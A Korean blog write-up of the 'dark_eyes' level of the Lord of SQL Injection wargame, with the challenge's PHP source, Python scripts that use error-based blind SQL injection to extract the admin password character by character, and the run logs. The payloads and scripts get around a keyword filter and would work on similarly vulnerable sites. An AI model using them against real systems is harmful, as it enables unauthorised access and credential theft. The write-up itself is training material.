[Lord Of SQL Injection] 22번(error blind sql)

---

query : select id from prob_dark_eyes where id='admin' and pw=''

---

<?php
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/col|if|case|when|sleep|benchmark/i', $_GET[pw])) exit("HeHe");
  $query = "select id from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(mysqli_error($db)) exit();
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  
  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("dark_eyes");
  highlight_file(__FILE__);
?>

 

21번 문제랑 비슷한데 다른점이 있다면 if문을 예외처리 했고 error가 발생해도 error문을 보여주지 않고 exit() 여백이 될것이다. 

 

import requests
import string

url = "https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php"
cookie = dict(PHPSESSID="qh6cd97grivfurvhcaobv2sqjt")

for i in range(1,100):
    param = "?pw='or id='admin' and (select 1 union select 2 where length(pw)="+str(i)+")%23"
    #param = "?pw='or id='admin' and if(length(pw)="+str(i)+", 1, (select 1 union select 2))%23"
    len_result = url+param
    response = requests.get(len_result, cookies=cookie)
    print(len_result)

    if response.text.find("query") < 0:
        print("password :"+str(i))
        break

(select 1 union select 2 where length(pw)="+str(i)+")

select 1 union select 2가 서브쿼리 오류를 발생시키고 그 조건으로 length(pw)="+str(i)+" :pw의 길이가 일정하면...

즉 where절의 조건을 만족시키면 서브쿼리 오류를 발생을 시킨다. 오류가 발생하면 아무것도 뜨지 않는다.(여백) 

id='admin' and (select 1 union select 2 where length(pw)=1)%23
https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php?pw='or 
id='admin' and (select 1 union select 2 where length(pw)=2)%23
https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php?pw='or 
id='admin' and (select 1 union select 2 where length(pw)=3)%23
https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php?pw='or 
id='admin' and (select 1 union select 2 where length(pw)=4)%23
https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php?pw='or 
id='admin' and (select 1 union select 2 where length(pw)=5)%23
https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php?pw='or 
id='admin' and (select 1 union select 2 where length(pw)=6)%23
https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php?pw='or 
id='admin' and (select 1 union select 2 where length(pw)=7)%23
https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php?pw='or 
id='admin' and (select 1 union select 2 where length(pw)=8)%23
password :8

패스워드 길이는 8자

 

패스워드를 구해보면

import requests
import string


url = "https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php"
cookie = dict(PHPSESSID="qh6cd97grivfurvhcaobv2sqjt")

asc = string.digits+string.ascii_letters
print(asc)
result=""

for i in range(1,9):
    for j in asc:
        param = "?pw='or id='admin' and (select 1 union select 2 where right(left(pw, "+str(i)+"),1)='"+str(j)+"') %23"
        #param = "?pw='or id='admin' and if(ord(substr(pw,"+str(i)+",1))="+str(ord(j))+",(select 1 union select 2), 1)%23"
        print(param)
        res_url = url+param
        response = requests.get(res_url, cookies=cookie)

        if response.text.find("query")<0:
            print(str(i)+"번째 패스워드 :"+j)
            result+=j
            break
print("pw :"+result)

?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 1),1)='0') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 1),1)='1') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 1),1)='2') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 1),1)='3') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 1),1)='4') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 1),1)='5') %23
1번째 패스워드 :5
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 2),1)='0') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 2),1)='1') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 2),1)='2') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 2),1)='3') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 2),1)='4') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 2),1)='5') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 2),1)='6') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 2),1)='7') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 2),1)='8') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 2),1)='9') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 2),1)='a') %23
2번째 패스워드 :a
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 3),1)='0') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 3),1)='1') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 3),1)='2') %23
3번째 패스워드 :2
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='0') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='1') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='2') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='3') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='4') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='5') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='6') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='7') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='8') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='9') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='a') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='b') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='c') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='d') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='e') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='f') %23
4번째 패스워드 :f
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 5),1)='0') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 5),1)='1') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 5),1)='2') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 5),1)='3') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 5),1)='4') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 5),1)='5') %23
5번째 패스워드 :5
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='0') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='1') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='2') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='3') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='4') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='5') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='6') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='7') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='8') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='9') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='a') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='b') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='c') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='d') %23
6번째 패스워드 :d
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 7),1)='0') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 7),1)='1') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 7),1)='2') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 7),1)='3') %23
7번째 패스워드 :3
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='0') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='1') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='2') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='3') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='4') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='5') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='6') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='7') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='8') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='9') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='a') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='b') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='c') %23
8번째 패스워드 :c
pw :5a2f5d3c

---

query : select id from prob_dark_eyes where id='admin' and pw='5a2f5d3c'

---

 

DARK_EYES Clear!

<?php
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/col|if|case|when|sleep|benchmark/i', $_GET[pw])) exit("HeHe");
  $query = "select id from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(mysqli_error($db)) exit();
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  
  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("dark_eyes");
  highlight_file(__FILE__);
?>

 

 

++추가

if response.text.find("query")<0:
            print(str(i)+"번째 패스워드 :"+j)
            result+=j
            break

"query"로 바뀐 이유는 바로 위에 페이지 화면을 보면 에러가 발생하면 위의 화면이 출력되지 않고 여백이 되니까 위의 내용중에 아무거나 제외시키면 됨. (query, select 등)